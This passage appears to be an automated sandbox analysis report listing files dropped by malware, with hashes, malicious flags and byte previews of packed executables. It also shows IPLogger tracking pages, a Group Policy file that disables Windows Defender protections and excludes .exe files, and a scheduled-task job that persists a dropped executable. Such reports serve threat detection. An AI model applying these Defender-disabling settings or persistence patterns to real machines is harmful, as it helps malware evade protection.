                                                                                                                                                                                                                                SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\Pictures\wAM2iVsYnasUH1XcQbAuEKO9.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

                                                                                                                                                                                                                                C:\Users\user\Pictures\wAyxI7uUktpH5TtM4zqnMftR.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):473089
                                                                                                                                                                                                                                Entropy (8bit):7.146087505769809
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
                                                                                                                                                                                                                                SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
                                                                                                                                                                                                                                SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L...x.%d.....................Z......O?............@..........................p..................................................P.......E...............................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc...E...........................@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\Pictures\wsXaFUksxPKBrRgSF8fdC4UJ.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

                                                                                                                                                                                                                                C:\Users\user\Pictures\wv3L00mTLTTnOX1S2obszDcX.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4407808
                                                                                                                                                                                                                                Entropy (8bit):7.9915034437777726
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:3953BBAD77CDCB9D5AF2694EED7E6688
                                                                                                                                                                                                                                SHA1:F965B69EB36D1FBDFB7DFA8C26BA959F395B3223
                                                                                                                                                                                                                                SHA-256:62206E7CB02B4FE03C535AA4DAAECFA46B42DBD28A756471E50784B7622CECAF
                                                                                                                                                                                                                                SHA-512:94A5033EDE92683E063829C5A8F2D720C919D1320BF4DB18CC9A2E2A69387530B4AFACC73CF987695A01C09ACBA1169EEA77A0FF269B41698147CD64E64A7D38
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d......f.........."....'.....^.................@......................................C... ..............................................................6...%s.................................................(.......................`............................MPRESS1..........@......................MPRESS2..............@..................rsrc....6.......8....A.............@..............................................................v2.19z...@. ..l...m.....:.m...|'*..c.k.X.........;.}Z....c.4...q..s......E...s.Z.:.+..........wj7..r.W.@J4.k.&.N.._.AZ..%|xu..}..u...u.]..\.H..c3\..d.l..\...xq|...zg....._.9?.rs.H..b0I.+.....7..'...O..K@.i...2....8.T.FC]..y.7a d...j)^".P....'7..Ey..p.......g.Ol.U.....@...+.5..-.....(..=bVr.z.L..........d.0.qM....`*.W..;Q P..^.9.&.(..S}7.Z3...Q..0.n<.B\.O.<(~..%..@....C.....3........sG...^T.U. _...vQp......g7..b..Dm......9E.`.p..Sn*p..b..4.|FUT..AWOs.........a.

                                                                                                                                                                                                                                C:\Users\user\Pictures\xvXQt3HWUPHZOypqdys3bcAm.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):473089
                                                                                                                                                                                                                                Entropy (8bit):7.146087505769809
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
                                                                                                                                                                                                                                SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
                                                                                                                                                                                                                                SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L...x.%d.....................Z......O?............@..........................p..................................................P.......E...............................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc...E...........................@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):473089
                                                                                                                                                                                                                                Entropy (8bit):7.146087505769809
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
                                                                                                                                                                                                                                SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
                                                                                                                                                                                                                                SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L...x.%d.....................Z......O?............@..........................p..................................................P.......E...............................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc...E...........................@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\Pictures\yREZhEa2ap6ZrOOJ0dooObNn.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

                                                                                                                                                                                                                                C:\Users\user\Pictures\zFZkiprzkq8Ae7mkklwscu5a.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4407808
                                                                                                                                                                                                                                Entropy (8bit):7.9915034437777726
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:3953BBAD77CDCB9D5AF2694EED7E6688
                                                                                                                                                                                                                                SHA1:F965B69EB36D1FBDFB7DFA8C26BA959F395B3223
                                                                                                                                                                                                                                SHA-256:62206E7CB02B4FE03C535AA4DAAECFA46B42DBD28A756471E50784B7622CECAF
                                                                                                                                                                                                                                SHA-512:94A5033EDE92683E063829C5A8F2D720C919D1320BF4DB18CC9A2E2A69387530B4AFACC73CF987695A01C09ACBA1169EEA77A0FF269B41698147CD64E64A7D38
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d......f.........."....'.....^.................@......................................C... ..............................................................6...%s.................................................(.......................`............................MPRESS1..........@......................MPRESS2..............@..................rsrc....6.......8....A.............@..............................................................v2.19z...@. ..l...m.....:.m...|'*..c.k.X.........;.}Z....c.4...q..s......E...s.Z.:.+..........wj7..r.W.@J4.k.&.N.._.AZ..%|xu..}..u...u.]..\.H..c3\..d.l..\...xq|...zg....._.9?.rs.H..b0I.+.....7..'...O..K@.i...2....8.T.FC]..y.7a d...j)^".P....'7..Ey..p.......g.Ol.U.....@...+.5..-.....(..=bVr.z.L..........d.0.qM....`*.W..;Q P..^.9.&.(..S}7.Z3...Q..0.n<.B\.O.<(~..%..@....C.....3........sG...^T.U. _...vQp......g7..b..Dm......9E.`.p..Sn*p..b..4.|FUT..AWOs.........a.

                                                                                                                                                                                                                                C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405128
                                                                                                                                                                                                                                Entropy (8bit):7.969340138439332
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
                                                                                                                                                                                                                                SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
                                                                                                                                                                                                                                SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\Pictures\zWhvfqZrtT7TUoWor4gRArPv.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405128
                                                                                                                                                                                                                                Entropy (8bit):7.969340138439332
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
                                                                                                                                                                                                                                SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
                                                                                                                                                                                                                                SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Windows\Logs\StorGroupPolicy.log

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                Size (bytes):29730
                                                                                                                                                                                                                                Entropy (8bit):4.923097437317754
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:13301E6F9B95319F74C4FC17AA6642D2
                                                                                                                                                                                                                                SHA1:93F1A042A07A91CA1D93B407539E7E84D0422F7A
                                                                                                                                                                                                                                SHA-256:D51718474BD81A10E843AFE64C36825F612AC9EDDAB1C372A8FDFCBD7229DC84
                                                                                                                                                                                                                                SHA-512:3CCF6ACE4CC25B30FD00515F83291C86F33FD02B08B1E5F567D34CE8438CC2B482FD02C973DA56493D32CDA1EF69DBEFAAD7E824C2FA497053DB49528D20B33B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:10/03/2023 7:55:56.00000693:RegEnumKeyExW failed with (259)..10/03/2023 7:55:56.00000693:GP object initialized successfully..10/03/2023 7:55:56.00000756:Deny_All not set for all. Will query other 6 GUIDs..10/03/2023 7:55:56.00000772:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000772:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000772:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000772:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000772:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000787:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000787:Deny_All for all devices is being reset..10/03/2023 7:55:56.00000787:Will delete security for disk..10/03/2023 7:55:56.00000787:Volume interface name \\?\storage#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}..10/0

                                                                                                                                                                                                                                C:\Windows\SysWOW64\GroupPolicy\gpt.ini

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):11
                                                                                                                                                                                                                                Entropy (8bit):3.2776134368191165
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:EC3584F3DB838942EC3669DB02DC908E
                                                                                                                                                                                                                                SHA1:8DCEB96874D5C6425EBB81BFEE587244C89416DA
                                                                                                                                                                                                                                SHA-256:77C7C10B4C860D5DDF4E057E713383E61E9F21BCF0EC4CFBBC16193F2E28F340
                                                                                                                                                                                                                                SHA-512:35253883BB627A49918E7415A6BA6B765C86B516504D03A1F4FD05F80902F352A7A40E2A67A6D1B99A14B9B79DAB82F3AC7A67C512CCF6701256C13D0096855E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:[General]..

                                                                                                                                                                                                                                C:\Windows\System32\GroupPolicy\Machine\Registry.pol

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
                                                                                                                                                                                                                                File Type:RAGE Package Format (RPF),
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7374
                                                                                                                                                                                                                                Entropy (8bit):3.4879173014280123
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:CBA9E747810E6F20E6F25B419EFE2B42
                                                                                                                                                                                                                                SHA1:B0F6457F3D1EAC06BFE7B9D8725E6AE6D9178DC6
                                                                                                                                                                                                                                SHA-256:8C9DEDB9A9E0727FBA7E3D619AFEB964536884DA722D3BDB8C1D8E46EE9A508B
                                                                                                                                                                                                                                SHA-512:0657881A21435B09E0DC4A2F4191FE99908675A4BFA6F7B11E7427BADF77E971389A0342992595E12EB4DAC518C2201E586C474C6E9A2089035B5744F6B9290E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:PReg....[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r...;.D.i.s.a.b.l.e.A.n.t.i.S.p.y.w.a.r.e...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r...;.D.i.s.a.b.l.e.R.o.u.t.i.n.e.l.y.T.a.k.i.n.g.A.c.t.i.o.n...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.E.x.c.l.u.s.i.o.n.s...;.E.x.c.l.u.s.i.o.n.s._.E.x.t.e.n.s.i.o.n.s...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.E.x.c.l.u.s.i.o.n.s.\.E.x.t.e.n.s.i.o.n.s...;.e.x.e...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.R.e.a.l.-.T.i.m.e. .P.r.o.t.e.c.t.i.o.n...;.D.i.s.a.b.l.e.B.e.h.a.v.i.o.r.M.o.n.i.t.o.r.i.n.g...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.R.e.a.l.-.T.i.m.e. .P.

                                                                                                                                                                                                                                C:\Windows\System32\GroupPolicy\gpt.ini

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):268
                                                                                                                                                                                                                                Entropy (8bit):4.9507895998010145
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:A62CE44A33F1C05FC2D340EA0CA118A4
                                                                                                                                                                                                                                SHA1:1F03EB4716015528F3DE7F7674532C1345B2717D
                                                                                                                                                                                                                                SHA-256:9F2CD4ACF23D565BC8498C989FCCCCF59FD207EF8925111DC63E78649735404A
                                                                                                                                                                                                                                SHA-512:9D9A4DA2DF0550AFDB7B80BE22C6F4EF7DA5A52CC2BB4831B8FF6F30F0EE9EAC8960F61CDD7CFE0B1B6534A0F9E738F7EB8EA3839D2D92ABEB81660DE76E7732
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:[General].gPCUserExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F73-3407-48AE-BA88-E8213C6761F1}].gPCMachineExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{0F6B957E-509E-11D1-A7CC-0000F87571E3}{D02B1F72-3407-48AE-BA88-E8213C6761F1}].Version=100001.

                                                                                                                                                                                                                                C:\Windows\Tasks\bWycNackLSywaqkmgR.job

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):522
                                                                                                                                                                                                                                Entropy (8bit):3.6884715835901827
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:58990C47685205572DE016B73FBAC5D5
                                                                                                                                                                                                                                SHA1:BF73959BF911C39DDD73D05AA6D015E9408E356C
                                                                                                                                                                                                                                SHA-256:630D6AB651E97A417675A36B795F2D87C5F87FCD7CE9EA7420118540010F6C15
                                                                                                                                                                                                                                SHA-512:29D5A315BEE86E9963AC760806ECDA11DE1D920C6EE80E47A4A7327D36A6AC424D1739C3E72FD2AC00DA53D7B9008FB6207F8CF150354E8176842EDAA23D4FAF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:......J[I.....v..F.......<... .....s...............................P.C.:.\.U.s.e.r.s.\.t.o.t.t.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.J.M.P.Z.e.W.v.H.h.A.r.m.q.R.O.v.Y.\.N.w.f.P.J.C.C.p.Q.q.P.Y.D.z.K.\.k.o.E.M.G.M.U...e.x.e.....e.m. ./.V.N.s.i.t.e._.i.d.n.L.d. .3.8.5.1.1.8. ./.S...D.C.:.\.U.s.e.r.s.\.t.o.t.t.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.J.M.P.Z.e.W.v.H.h.A.r.m.q.R.O.v.Y.\.N.w.f.P.J.C.C.p.Q.q.P.Y.D.z.K.....T.O.T.T.I.-.P.C.\.t.o.t.t.i...................0.................&.............................

                                                                                                                                                                                                                                C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\JUnCNhn.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7157248
                                                                                                                                                                                                                                Entropy (8bit):7.756166190918081
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:E77964E011D8880EAE95422769249CA4
                                                                                                                                                                                                                                SHA1:8E15D7C4B7812A1DA6C91738C7178ADF0FF3200F
                                                                                                                                                                                                                                SHA-256:F200984380D291051FC4B342641CD34E7560CADF4AF41B2E02B8778F14418F50
                                                                                                                                                                                                                                SHA-512:8FEB3DC4432EC0A87416CBC75110D59EFAF6504B4DE43090FC90286BD37F98FC0A5FB12878BB33AC2F6CD83252E8DFD67DD96871B4A224199C1F595D33D4CADE
